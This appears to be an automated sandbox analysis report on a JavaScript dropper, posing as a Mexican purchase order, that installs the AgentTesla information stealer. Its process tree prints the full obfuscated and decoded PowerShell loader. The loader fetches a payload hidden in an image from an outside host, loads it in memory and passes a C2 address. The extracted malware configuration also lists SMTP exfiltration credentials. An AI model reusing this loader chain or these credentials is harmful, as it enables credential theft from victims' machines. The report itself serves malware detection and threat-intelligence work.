Edit tour

Windows Analysis Report
Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js

Overview

General Information

Sample name:	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js
Analysis ID:	1501653
MD5:	4885ff24f6e08d06d817f1d5a465d277
SHA1:	94f27f7dda23c40a4fb7734c72e982db3bce6d4e
SHA256:	cb9005fe5424e490dc8561b51e9d0b9c591174f2f08e72cba8d552934c0feabe
Tags:	js
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Sigma detected: Powershell download and load assembly

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Creates autostart registry keys with suspicious values (likely registry only malware)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7340 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 7388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBF? ? ? ? ?E4? ? ? ? ?R? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D? ? ? ? ?? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cs? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?LgBM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?HU? ? ? ? ?YgBz? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?QwBv? ? ? ? ?G4? ? ? ? ?dgBl? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?Bd? ? ? ? ?Do? ? ? ? ?OgBG? ? ? ? ?HI? ? ? ? ?bwBt? ? ? ? ?EI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?UgBl? ? ? ? ?GY? ? ? ? ?b? ? ? ? ?Bl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?G8? ? ? ? ?bg? ? ? ? ?u? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQBd? ? ? ? ?Do? ? ? ? ?OgBM? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?V? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bu? ? ? ? ?Gw? ? ? ? ?aQBi? ? ? ? ?C4? ? ? ? ?SQBP? ? ? ? ?C4? ? ? ? ?S? ? ? ? ?Bv? ? ? ? ?G0? ? ? ? ?ZQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?G0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?E0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?Cg? ? ? ? ?JwBW? ? ? ? ?EE? ? ? ? ?SQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?dgBv? ? ? ? ?Gs? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?bgB1? ? ? ? ?Gw? ? ? ? ?b? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBv? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bb? ? ? ? ?F0? ? ? ? ?XQ? ? ? ? ?g? ? ? ? ?Cg? ? ? ? ?JwB0? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?RwBS? ? ? ? ?E8? ? ? ? ?LwBn? ? ? ? ?G8? ? ? ? ?b? ? ? ? ?? ? ? ? ?v? ? ? ? ?G0? ? ? ? ?bwBj? ? ? ? ?C4? ? ? ? ?bwBu? ? ? ? ?GE? ? ? ? ?c? ? ? ? ?Bu? ? ? ? ?GE? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?HM? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?MQ? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Qw? ? ? ? ?6? ? ? ? ?Fw? ? ? ? ?U? ? ? ? ?By? ? ? ? ?G8? ? ? ? ?ZwBy? ? ? ? ?GE? ? ? ? ?bQBE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Fw? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GE? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?dgBp? ? ? ? ?GM? ? ? ? ?ZQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBJ? ? ? ? ?G4? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?FU? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?Gw? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7664 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\alarvice.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

InstallUtil.exe (PID: 7736 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.2946845698.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2946845698.0000000002F21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.2946845698.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.2946845698.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.1778936511.000001CB9586E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1778936511.000001CB9586E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: powershell.exe PID: 7388	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7388	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xdb12c:$b2: ::FromBase64String( 0xdb892:$b2: ::FromBase64String( 0xdc7cb:$b2: ::FromBase64String( 0xdcc30:$b2: ::FromBase64String( 0xdd1b7:$b2: ::FromBase64String( 0xdd5d3:$b2: ::FromBase64String( 0xf8a64:$b2: ::FromBase64String( 0xdafa0:$b3: ::UTF8.GetString( 0xdb706:$b3: ::UTF8.GetString( 0xdc63f:$b3: ::UTF8.GetString( 0xdcaa4:$b3: ::UTF8.GetString( 0xdd02b:$b3: ::UTF8.GetString( 0xdd447:$b3: ::UTF8.GetString( 0x3941c:$s1: -join 0x3fd82:$s1: -join 0x4386:$s3: reverse 0xe3bc:$s3: reverse 0x18744:$s3: reverse 0x18a32:$s3: reverse 0x1914c:$s3: reverse 0x19905:$s3: reverse
Process Memory Space: powershell.exe PID: 7552	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7552	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 7552	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: powershell.exe PID: 7552	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1248b5:$b2: ::FromBase64String( 0x12cf48:$b2: ::FromBase64String( 0x1416a5:$b2: ::FromBase64String( 0x141b76:$b2: ::FromBase64String( 0x145c1c:$b2: ::FromBase64String( 0x15bf54:$b2: ::FromBase64String( 0x15c365:$b2: ::FromBase64String( 0x15cab2:$b2: ::FromBase64String( 0x829967:$b2: ::FromBase64String( 0x829d78:$b2: ::FromBase64String( 0x86fe25:$b2: ::FromBase64String( 0x870236:$b2: ::FromBase64String( 0x889dfa:$b2: ::FromBase64String( 0x88a35b:$b2: ::FromBase64String( 0x88e91e:$b2: ::FromBase64String( 0x88ed36:$b2: ::FromBase64String( 0x88f351:$b2: ::FromBase64String( 0x88f924:$b2: ::FromBase64String( 0x124729:$b3: ::UTF8.GetString( 0x12cdbc:$b3: ::UTF8.GetString( 0x141519:$b3: ::UTF8.GetString(
Process Memory Space: InstallUtil.exe PID: 7736	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7736	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
